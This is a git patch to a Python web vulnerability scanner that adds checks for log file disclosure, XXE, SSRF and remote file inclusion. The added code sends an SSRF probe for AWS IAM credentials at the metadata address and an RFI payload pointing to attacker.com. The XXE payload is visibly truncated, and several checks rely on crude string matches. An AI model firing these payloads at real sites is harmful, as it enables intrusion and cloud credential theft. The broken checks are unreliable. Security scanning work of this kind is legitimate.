From ea079ee70ae1418e7b2157376ac5790f9b022032 Mon Sep 17 00:00:00 2001 From: AliElTop <66541902+dragonked2@users.noreply.github.com> Date: Sun, 2 Jul 2023 03:28:08 +0300 Subject: [PATCH] Version2.1 --- egy.py | 53 +++++++++++++++++++++++++++++++++++++++++++++++++++-- 1 file changed, 51 insertions(+), 2 deletions(-) diff --git a/egy.py b/egy.py index 62419cb..39c25c8 100644 --- a/egy.py +++ b/egy.py @@ -101,8 +101,6 @@ def check_backup_files(url): return False - - def check_database_exposure(url): endpoints = ["phpmyadmin", "adminer", "dbadmin"] for endpoint in endpoints: @@ -126,6 +124,40 @@ def check_sensitive_information(url): if keyword in response.text: return True return False + +def check_log_files(url): + log_files = ["access.log", "error.log"] + parsed_url = urlparse(url) + + for log_file in log_files: + log_url = f"{parsed_url.scheme}://{parsed_url.netloc}/{log_file}" + response = requests.get(log_url) + if response.status_code == 200 and "log content" in response.text: + return True + + return False + +def check_xxe(url): + payload = ']>&xxe;' + response = requests.post(url, data=payload) + if response.status_code == 200 and "root:" in response.text: + return True + return False + +def check_ssrf(url): + payload = "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin" + response = requests.get(url + "?url=" + payload) + if response.status_code == 200 and "AccessDenied" not in response.text: + return True + return False + +def check_rfi(url): + payload = "http://attacker.com/malicious_script.php" + response = requests.get(url + "?file=" + payload) + if response.status_code == 200 and "Malicious script executed" in response.text: + return True + return False + session = requests.Session() @@ -264,6 +296,15 @@ def scan_url(url): logging.warning(f"Directory Listings: {url}") if check_sensitive_information(url): logging.warning(f"Sensitive Information exposure: {url}") + if check_xxe(url): + logging.warning(f"XXE: {url}") + if check_ssrf(url): + logging.warning(f"SSRF: {url}") + if check_rfi(url): + logging.warning(f"RFI: {url}") + if check_log_files(url): + logging.warning(f"Log File Disclosure: {url}") + def scan_response(response): if check_sqli(response.url): @@ -284,6 +325,14 @@ def scan_response(response): logging.warning(f"Directory Listings: {response.url}") if check_sensitive_information(response.url): logging.warning(f"Sensitive Information: {response.url}") + if check_xxe(response.url): + logging.warning(f"XXE: {response.url}") + if check_ssrf(response.url): + logging.warning(f"SSRF: {response.url}") + if check_rfi(response.url): + logging.warning(f"RFI: {response.url}") + if check_log_files(response.url): + logging.warning(f"Log File Disclosure: {response.url}") def print_colorful(message, color=Fore.GREEN):